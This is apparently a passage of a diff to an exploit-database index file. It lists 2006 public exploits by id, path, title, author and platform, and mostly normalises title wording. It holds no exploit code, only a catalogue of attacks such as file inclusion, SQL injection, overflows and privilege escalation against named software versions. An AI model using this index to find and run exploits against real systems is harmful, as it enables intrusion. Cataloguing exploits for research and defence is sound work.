2317,platforms/php/webapps/2317.txt,"SL_Site 1.0 - (spaw_root) Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps,0 2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote File Inclusion",2006-09-07,"Mehmet Ince",php,webapps,0 2319,platforms/php/webapps/2319.txt,"Fire Soft Board RC 3 - (racine) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 -2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Transversal",2006-09-07,"Daniel Clemens",windows,remote,411 -2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0 +2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 +2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution",2006-09-07,rgod,php,webapps,0 2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b - 'dwpage.php' System Disclosure Exploit",2006-09-07,rgod,php,webapps,0 -2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - (Include) Remote File Inclusion",2006-09-07,"the master",php,webapps,0 +2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - 'Include' Remote File Inclusion",2006-09-07,"the master",php,webapps,0 2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - (dir_path) Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps,0 -2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution Exploit",2006-09-08,rgod,windows,remote,80 +2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80 2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - (skin_dir) Remote File Inclusion",2006-09-08,basher13,php,webapps,0 2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0 -2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 -2334,platforms/windows/dos/2334.py,"Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service",2006-09-08,n00b,windows,dos,0 +2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps,0 +2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - (Long Get Request) Denial of Service",2006-09-08,n00b,windows,dos,0 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 -2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks 2.0 - (root_dir) Remote File Inclusion Exploit",2006-09-09,Kacper,php,webapps,0 +2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - (name) Local Buffer Overflow",2006-09-09,Qnix,linux,local,0 2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - (classified_path) File Include",2006-09-09,MercilessTurk,php,webapps,0 -2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - (config.php) Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 -2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - (root_path) File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 +2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 +2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion",2006-09-10,Solpot,php,webapps,0 2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - (config) Remote File Inclusion",2006-09-11,basher13,php,webapps,0 -2345,platforms/windows/remote/2345.pl,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 -2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - (include_path) Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 +2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 +2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps,0 2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 -2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - (functions.php) Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 +2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - (abs_pfad) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 -2354,platforms/php/webapps/2354.txt,"Signkorn GuestBook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard - (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 @@ -2065,13 +2066,13 @@ id,file,description,date,author,platform,type,port 2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 - File Include",2006-09-14,"Mehmet Ince",php,webapps,0 2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0 -2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - (com_contact) Remote Code Execution Exploit",2006-09-15,rgod,php,webapps,0 +2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - (com_contact) Remote Code Execution",2006-09-15,rgod,php,webapps,0 2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 -2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion Exploit",2006-09-15,Kacper,php,webapps,0 +2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 -2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution Exploit",2006-09-16,simo64,php,webapps,0 +2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps,0 2378,platforms/php/webapps/2378.php,"GNUTURK 2G - (t_id) SQL Injection",2006-09-16,p2y,php,webapps,0 2379,platforms/php/webapps/2379.txt,"Mambo com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0 @@ -2084,29 +2085,29 @@ id,file,description,date,author,platform,type,port 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 -2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 -2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 +2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 +2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0 2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - (new_calendarid) SQL Injection",2006-09-19,x128,php,webapps,0 2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - (tr) SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps,0 -2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) SQL Injection / Code Execution Exploit",2006-09-19,STILPU,php,webapps,0 +2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0 2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion",2006-09-19,ajann,php,webapps,0 -2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - (root_path) Remote File Inclusion",2006-09-19,ajann,php,webapps,0 +2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer - (VML) Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos,0 2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 - (PASV response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0 -2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution Exploit",2006-09-20,Kacper,php,webapps,0 +2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow",2006-09-20,nop,windows,remote,0 -2404,platforms/linux/local/2404.c,"Dr.Web Antivirus 4.33 - (LHA long directory name) Local Overflow",2006-09-20,Guay-Leroux,linux,local,0 +2404,platforms/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - (LHA long Directory name) Local Overflow",2006-09-20,Guay-Leroux,linux,local,0 2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - (cfg_serverpath) Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0 2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - (nbs) Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 -2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (XP SP1) - (VML) Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",windows,remote,0 +2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - (VML) Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",windows,remote,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 -2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion Exploit",2006-09-21,Kacper,php,webapps,0 +2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2412,platforms/windows/local/2412.c,"Microsoft Windows - Kernel Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Include / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -2120,81 +2121,81 @@ id,file,description,date,author,platform,type,port 2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0 2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 -2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (XP SP2) - (VML) Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote,0 +2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - (VML) Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote,0 2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) - Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - (phpbb_root_path) File Include",2006-09-25,SHiKaA,php,webapps,0 +2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Include",2006-09-25,SHiKaA,php,webapps,0 2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - (path) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Include",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"WEB//NEWS 1.4 - (parser.php) Remote File Inclusion",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 -2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion Exploit",2006-09-26,Kacper,php,webapps,0 +2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0 -2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 +2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0 2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos,0 2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow",2006-09-27,h07,windows,remote,80 -2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - (functions.inc.php) Remote File Inclusion Exploit",2006-09-28,Kacper,php,webapps,0 -2447,platforms/php/webapps/2447.php,"KGB 1.87 - (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 +2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - (functions.inc.php) Remote File Inclusion",2006-09-28,Kacper,php,webapps,0 +2447,platforms/php/webapps/2447.php,"KGB 1.87 - (Local Inclusion) Remote Code Execution",2006-09-28,Kacper,php,webapps,0 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 -2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - (config.inc.php) File Include",2006-09-28,D_7J,php,webapps,0 +2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Include",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"PHPMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"PHPSecurePages 0.28b - (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 -2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - (phpBB_root_path) Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 +2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a - 'phpbb_root_path' Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a - 'index.php' Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps,0 -2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - (pdf.php) Remote File Inclusion Exploit",2006-09-29,Kacper,php,webapps,0 +2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - (pdf.php) Remote File Inclusion",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - (display.php) SQL Injection",2006-09-29,Trex,php,webapps,0 -2457,platforms/php/webapps/2457.php,"UBB.threads 6.5.1.1 - (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 +2457,platforms/php/webapps/2457.php,"UBB.Threads 6.5.1.1 - (doeditconfig.php) Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (Perl) (1)",2006-09-29,"YAG KOHHA",windows,remote,0 2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (2)",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - (yesno.phtml) Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 -2463,platforms/osx/local/2463.c,"Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 -2464,platforms/osx/local/2464.pl,"Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 -2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion Exploit",2006-10-01,Kacper,php,webapps,0 +2463,platforms/osx/local/2463.c,"Apple Mac OS X 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 +2464,platforms/osx/local/2464.pl,"Apple Mac OS X 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 +2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - (includes/functions.php) Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 -2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - (forum.php) Remote File Inclusion Exploit",2006-10-03,Kacper,php,webapps,0 +2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0 -2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - (frontpage.php) Remote File Inclusion Exploit",2006-10-03,Kacper,php,webapps,0 +2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 -2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - ReadFile() & SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0 +2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - readfile() & SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0 2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Include",2006-10-04,SpiderZ,php,webapps,0 2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - (footer.php) Remote File Inclusion",2006-10-04,mozi,php,webapps,0 -2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpBB_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 +2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0 2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 -2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - (phpBB_root_path) Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 +2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0 2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - File Include",2006-10-06,"Mehmet Ince",php,webapps,0 -2484,platforms/php/webapps/2484.txt,"FreeForum 0.9.7 - (forum.php) Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps,0 +2484,platforms/php/webapps/2484.txt,"FreeForum 0.9.7 - 'forum.php' Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps,0 2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - (lire.php) SQL Injection",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod - Inclusion",2006-10-07,bd0rk,php,webapps,0 2487,platforms/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,php,webapps,0 2488,platforms/php/webapps/2488.txt,"PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 -2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - (config.php) Remote File Inclusion Exploit",2006-10-08,Kacper,php,webapps,0 +2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - (moteur.php) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 -2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - (/lib/functions.inc.php) Remote File Inclusion Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - (/lib/functions.inc.php) Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 2492,platforms/linux/local/2492.s,".ELF Binaries - Privilege Escalation",2006-10-08,Sha0,linux,local,0 -2493,platforms/php/webapps/2493.pl,"docmint 2.0 - (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 +2493,platforms/php/webapps/2493.pl,"docmint 2.0 - (engine/require.php) Remote File Inclusion",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - (doc_directory) File 